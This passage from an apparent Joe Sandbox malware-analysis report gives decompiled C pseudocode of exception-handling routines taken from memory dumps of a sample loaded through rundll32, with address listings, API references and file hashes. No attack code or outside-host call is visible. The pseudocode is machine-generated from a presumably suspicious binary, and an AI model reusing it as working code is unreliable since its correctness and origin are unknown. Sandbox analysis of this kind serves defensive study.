								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6fc44180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6fc44180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6fc423cf
0x6fc423d2
0x6fc423d8
0x6fc423f6
0x00000000
0x6fc423f6
0x6fc423e0
0x6fc423e9
0x6fc423ef
0x6fc423fe
0x6fc42401
0x6fc42404
0x6fc4240e
0x6fc4240e
0x6fc42410
0x6fc42413
0x6fc42415
0x6fc42415
0x6fc42417
0x6fc4241a
0x00000000
0x00000000
0x6fc4241c
0x6fc4241e
0x6fc42484
0x6fc42484
0x6fc425e2
0x00000000
0x6fc425e2
0x6fc42420
0x6fc42420
0x6fc42424
0x6fc42426
0x6fc42426
0x6fc42426
0x6fc42426
0x6fc42429
0x6fc4242a
0x6fc4242d
0x6fc4242d
0x6fc42431
0x6fc42435
0x6fc42443
0x6fc42443
0x6fc4244b
0x6fc42451
0x6fc42453
0x6fc42455
0x6fc42465
0x6fc42472
0x6fc42476
0x6fc4247b
0x6fc4247d
0x6fc424fb
0x6fc424fb
0x6fc4247f
0x6fc4247f
0x6fc4247f
0x6fc424fd
0x6fc424ff
0x6fc425e0
0x6fc425e0
0x00000000
0x6fc42505
0x6fc42505
0x6fc4250c
0x00000000
0x00000000
0x6fc42512
0x6fc42516
0x6fc42572
0x6fc42574
0x6fc4257c
0x6fc4257e
0x6fc42580
0x00000000
0x00000000
0x6fc42582
0x6fc42588
0x6fc4258a
0x6fc4258c
0x6fc425a1
0x6fc425a1
0x6fc425a3
0x6fc425d2
0x6fc425d9
0x00000000
0x6fc425d9
0x6fc425a7
0x6fc425a8
0x6fc425aa
0x6fc425ac
0x6fc425ac
0x6fc425ae
0x6fc425b0
0x6fc425b2
0x6fc425c6
0x6fc425c6
0x6fc425c9
0x6fc425cb
0x6fc425cb
0x6fc425cc
0x6fc425cc
0x00000000
0x6fc425b4
0x6fc425b4
0x6fc425b4
0x6fc425bd
0x6fc425be
0x6fc425c0
0x6fc425c2
0x6fc425c2
0x00000000
0x6fc425b4
0x6fc425b2
0x6fc4258e
0x6fc42595
0x6fc42595
0x6fc42597
0x00000000
0x00000000
0x6fc42599
0x6fc4259a
0x6fc4259d
0x6fc4259f
0x00000000
0x00000000
0x00000000
0x6fc4259f
0x00000000
0x6fc42595
0x6fc42518
0x6fc4251b
0x6fc42520
0x00000000
0x00000000
0x6fc42529
0x6fc4252b
0x6fc42531
0x00000000
0x00000000
0x6fc42537
0x6fc4253d
0x00000000
0x00000000
0x6fc42543
0x6fc42545
0x6fc4254e
0x6fc42552
0x00000000
0x00000000
0x6fc42558
0x6fc4255b
0x6fc4255d
0x00000000
0x00000000
0x6fc42564
0x6fc42566
0x00000000
0x00000000
0x6fc42568
0x6fc4256c
0x00000000
0x00000000
0x00000000
0x6fc4256c
0x00000000
0x00000000
0x00000000
0x6fc42457
0x6fc42457
0x6fc42457
0x6fc4245e
0x00000000
0x00000000
0x6fc42460
0x6fc42461
0x6fc42463
0x00000000
0x00000000
0x00000000
0x6fc42463
0x6fc4248b
0x6fc4248d
0x00000000
0x00000000
0x6fc4249d
0x6fc4249f
0x6fc424a1
0x00000000
0x00000000
0x6fc424a7
0x6fc424ae
0x6fc424da
0x6fc424da
0x6fc424dc
0x6fc424de
0x6fc424f2
0x6fc424f4
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc424e0
0x6fc424e0
0x6fc424e0
0x6fc424e9
0x6fc424ea
0x6fc424ec
0x6fc424ee
0x6fc424ee
0x00000000
0x6fc424e0
0x6fc424b0
0x6fc424b3
0x6fc424b5
0x6fc424c7
0x6fc424c7
0x6fc424ca
0x6fc424cc
0x6fc424cc
0x6fc424cd
0x6fc424cd
0x6fc424d3
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc424b7
0x6fc424b7
0x6fc424b7
0x6fc424be
0x00000000
0x00000000
0x6fc424c0
0x6fc424c0
0x6fc424c1
0x00000000
0x00000000
0x00000000
0x6fc424c1
0x6fc424c3
0x6fc424c5
0x6fc424d8
0x00000000
0x00000000
0x00000000
0x6fc424d8
0x00000000
0x6fc424c5
0x6fc42437
0x6fc4243a
0x6fc4243d
0x00000000
0x00000000
0x6fc4243f
0x6fc42441
0x00000000
0x00000000
0x00000000
0x6fc42441
0x6fc42406
0x6fc42408
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6FC42476

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 4a34c4dd83de84627bf31f40a3e4ab3318ffa64c32d742715c7b7ea6c0944386
Instruction ID: e999dd6092844110747f9de6bc5bf2ef2aaddd2597a38fddaf79119232f2b659
Opcode Fuzzy Hash: 4a34c4dd83de84627bf31f40a3e4ab3318ffa64c32d742715c7b7ea6c0944386
Instruction Fuzzy Hash: 1061F630E046068FDB19CF29D8B27D977B5FF86354B209169D966CB180F730E886CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B169, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A1B169(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xa1d288; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xa1d2d0 = 1;
										__eflags =  *0xa1d2d0;
										if( *0xa1d2d0 != 0) {
											goto L60;
										}
										_t84 =  *0xa1d288; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xa1d2d0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0xa1d288 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0xa1d290 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0xa1d28c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0xa1d290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa1d290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0xa1d2d0 = 1;
							__eflags =  *0xa1d2d0;
							if( *0xa1d2d0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0xa1d290 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0xa1d290 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0xa1d2d0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0xa1d290 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0xa1d288 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0xa1d290 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0xa1d290 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x00a1b173
0x00a1b176
0x00a1b17c
0x00a1b19a
0x00000000
0x00a1b19a
0x00a1b184
0x00a1b18d
0x00a1b193
0x00a1b1a2
0x00a1b1a5
0x00a1b1a8
0x00a1b1b2
0x00a1b1b2
0x00a1b1b4
0x00a1b1b7
0x00a1b1b9
0x00a1b1b9
0x00a1b1bb
0x00a1b1be
0x00000000
0x00000000
0x00a1b1c0
0x00a1b1c2
0x00a1b228
0x00a1b228
0x00a1b386
0x00000000
0x00a1b386
0x00a1b1c4
0x00a1b1c4
0x00a1b1c8
0x00a1b1ca
0x00a1b1ca
0x00a1b1ca
0x00a1b1ca
0x00a1b1cd
0x00a1b1ce
0x00a1b1d1
0x00a1b1d1
0x00a1b1d5
0x00a1b1d9
0x00a1b1e7
0x00a1b1e7
0x00a1b1ef
0x00a1b1f5
0x00a1b1f7
0x00a1b1f9
0x00a1b209
0x00a1b216
0x00a1b21a
0x00a1b21f
0x00a1b221
0x00a1b29f
0x00a1b29f
0x00a1b223
0x00a1b223
0x00a1b223
0x00a1b2a1
0x00a1b2a3
0x00a1b384
0x00a1b384
0x00000000
0x00a1b2a9
0x00a1b2a9
0x00a1b2b0
0x00000000
0x00000000
0x00a1b2b6
0x00a1b2ba
0x00a1b316
0x00a1b318
0x00a1b320
0x00a1b322
0x00a1b324
0x00000000
0x00000000
0x00a1b326
0x00a1b32c
0x00a1b32e
0x00a1b330
0x00a1b345
0x00a1b345
0x00a1b347
0x00a1b376
0x00a1b37d
0x00000000
0x00a1b37d
0x00a1b34b
0x00a1b34c
0x00a1b34e
0x00a1b350
0x00a1b350
0x00a1b352
0x00a1b354
0x00a1b356
0x00a1b36a
0x00a1b36a
0x00a1b36d
0x00a1b36f
0x00a1b36f
0x00a1b370
0x00a1b370
0x00000000
0x00a1b358
0x00a1b358
0x00a1b358
0x00a1b361
0x00a1b362
0x00a1b364
0x00a1b366
0x00a1b366
0x00000000
0x00a1b358
0x00a1b356
0x00a1b332
0x00a1b339
0x00a1b339
0x00a1b33b
0x00000000
0x00000000
0x00a1b33d
0x00a1b33e
0x00a1b341
0x00a1b343
0x00000000
0x00000000
0x00000000
0x00a1b343
0x00000000
0x00a1b339
0x00a1b2bc
0x00a1b2bf
0x00a1b2c4
0x00000000
0x00000000
0x00a1b2cd
0x00a1b2cf
0x00a1b2d5
0x00000000
0x00000000
0x00a1b2db
0x00a1b2e1
0x00000000
0x00000000
0x00a1b2e7
0x00a1b2e9
0x00a1b2f2
0x00a1b2f6
0x00000000
0x00000000
0x00a1b2fc
0x00a1b2ff
0x00a1b301
0x00000000
0x00000000
0x00a1b308
0x00a1b30a
0x00000000
0x00000000
0x00a1b30c
0x00a1b310
0x00000000
0x00000000
0x00000000
0x00a1b310
0x00000000
0x00000000
0x00000000
0x00a1b1fb
0x00a1b1fb
0x00a1b1fb
0x00a1b202
0x00000000
0x00000000
0x00a1b204
0x00a1b205
0x00a1b207
0x00000000
0x00000000
0x00000000
0x00a1b207
0x00a1b22f
0x00a1b231
0x00000000
0x00000000
0x00a1b241
0x00a1b243
0x00a1b245
0x00000000
0x00000000
0x00a1b24b
0x00a1b252
0x00a1b27e
0x00a1b27e
0x00a1b280
0x00a1b282
0x00a1b296
0x00a1b298
0x00000000
0x00000000
0x00000000
0x00000000
0x00a1b284
0x00a1b284
0x00a1b284
0x00a1b28d
0x00a1b28e
0x00a1b290
0x00a1b292
0x00a1b292
0x00000000
0x00a1b284
0x00a1b254
0x00a1b254
0x00a1b257
0x00a1b259
0x00a1b26b
0x00a1b26b
0x00a1b26e
0x00a1b270
0x00a1b270
0x00a1b271
0x00a1b271
0x00a1b277
0x00a1b277
0x00000000
0x00000000
0x00000000
0x00000000
0x00a1b25b
0x00a1b25b
0x00a1b25b
0x00a1b262
0x00000000
0x00000000
0x00a1b264
0x00a1b264
0x00a1b265
0x00000000
0x00000000
0x00000000
0x00a1b265
0x00a1b267
0x00a1b269
0x00a1b27c
0x00000000
0x00000000
0x00000000
0x00a1b27c
0x00000000
0x00a1b269
0x00a1b1db
0x00a1b1de
0x00a1b1e1
0x00000000
0x00000000
0x00a1b1e3
0x00a1b1e5
0x00000000
0x00000000
0x00000000
0x00a1b1e5
0x00a1b1aa
0x00a1b1ac
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A1B21A

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 111ea6e01c08ecca8055a7077219098846e79a8a6689587c4987ec3b7fc0b1ca
Instruction ID: 42146973c00d102c6977df2211b0bb90ccd39df1723aafa861a79abc34c65738
Opcode Fuzzy Hash: 111ea6e01c08ecca8055a7077219098846e79a8a6689587c4987ec3b7fc0b1ca
Instruction Fuzzy Hash: 756107306206229FDB19CF29D9906FD73E6EB95354F288628D425CB5A0E370DCC6C770

Uniqueness

Uniqueness Score: -1.00%

Function 6FC6950C, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(6FC6884F,6FC83CF8,00000008,6FC68A25,?,00000001,?,6FC83D18,0000000C,6FC689C4,?,00000001,?), ref: 6FC6950C

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 82b66044dab4d857d3c441ea82c1b0251a556ed31c2617db3dec454f49f9b4a1
Instruction ID: 025212b084148b5f685003175460793a7b9ecd3cb21db82c8a45769a408f0014
Opcode Fuzzy Hash: 82b66044dab4d857d3c441ea82c1b0251a556ed31c2617db3dec454f49f9b4a1
Instruction Fuzzy Hash: 18B012F1301903874F090B3D541500935FC774D221301003D7107C2340DF20C4749A00

Uniqueness

Uniqueness Score: -1.00%

Function 6FC421A4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6FC421A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6FC4230B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6FC423C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6FC422B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6FC4230B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6FC423A7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6fc421a8
0x6fc421a9
0x6fc421aa
0x6fc421ad
0x6fc421af
0x6fc421b2
0x6fc421b3
0x6fc421b5
0x6fc421b6
0x6fc421b7
0x6fc421ba
0x6fc421c4
0x6fc42275
0x6fc4227c
0x6fc42285
0x6fc421ca
0x6fc421ca
0x6fc421d0
0x6fc421d6
0x6fc421d9
0x6fc421dc
0x6fc421e0
0x6fc421e5
0x6fc421ea
0x6fc4226a
0x00000000
0x6fc421ec
0x6fc421ec
0x6fc421f8
0x6fc421fa
0x6fc42255
0x6fc42255
0x6fc4225b
0x00000000
0x6fc421fc
0x6fc4220b
0x6fc4220d
0x6fc4220e
0x6fc4220f
0x6fc42212
0x6fc42212
0x6fc42214
0x00000000
0x6fc42216
0x6fc42216
0x6fc42260
0x6fc42218
0x6fc42218
0x6fc4221c
0x6fc42224
0x6fc42229
0x6fc4222e
0x6fc4223a
0x6fc42242
0x6fc42249
0x6fc4224f
0x6fc42253
0x00000000
0x6fc42253
0x6fc42216
0x6fc42214
0x00000000
0x6fc421fa
0x6fc4226e
0x6fc4226e
0x6fc4226e
0x6fc421ea
0x6fc4228a
0x6fc42291

Memory Dump Source

Source File: 00000002.00000002.647343903.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.647310051.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647360060.000000006FC43000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.647382483.000000006FC45000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.647405824.000000006FC46000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: f16e248002693cd45ee9aeeb56aec096e9cfc6c639151834ad129d4174fbb180
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 5C21A4729042059BCB10DF68CC919EBBBA9FF89360B0581A9DD55DB245E730FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AF44, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00A1AF44(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00A1B0AF(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00A1B169(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00A1B054(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00A1B0AF(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00A1B14B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00a1af48
0x00a1af49
0x00a1af4a
0x00a1af4d
0x00a1af4f
0x00a1af52
0x00a1af53
0x00a1af55
0x00a1af56
0x00a1af57
0x00a1af5a
0x00a1af64
0x00a1b015
0x00a1b01c
0x00a1b025
0x00a1af6a
0x00a1af6a
0x00a1af70
0x00a1af76
0x00a1af79
0x00a1af7c
0x00a1af80
0x00a1af85
0x00a1af8a
0x00a1b00a
0x00000000
0x00a1af8c
0x00a1af8c
0x00a1af98
0x00a1af9a
0x00a1aff5
0x00a1aff5
0x00a1affb
0x00000000
0x00a1af9c
0x00a1afab
0x00a1afad
0x00a1afae
0x00a1afaf
0x00a1afb2
0x00a1afb2
0x00a1afb4
0x00000000
0x00a1afb6
0x00a1afb6
0x00a1b000
0x00a1afb8
0x00a1afb8
0x00a1afbc
0x00a1afc4
0x00a1afc9
0x00a1afce
0x00a1afda
0x00a1afe2
0x00a1afe9
0x00a1afef
0x00a1aff3
0x00000000
0x00a1aff3
0x00a1afb6
0x00a1afb4
0x00000000
0x00a1af9a
0x00a1b00e
0x00a1b00e
0x00a1b00e
0x00a1af8a
0x00a1b02a
0x00a1b031

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: e09af9359d772dfe31ff9902bf7b60f2708e737f6d7b2e1eb64ba6a463b5edbe
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: DE21A4729002049FCB14EF68C8859EBBBA5BF48350B0A8168E91ADB245DB30F955C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 6FC87E40, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.647783869.000000006FC87000.00000040.00020000.sdmp, Offset: 6FC87000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc87000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 734720b28b1437828eb64d3ed8dbeb5a1e7254baeb6a1948bb9f0ebf5f8c83b7
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
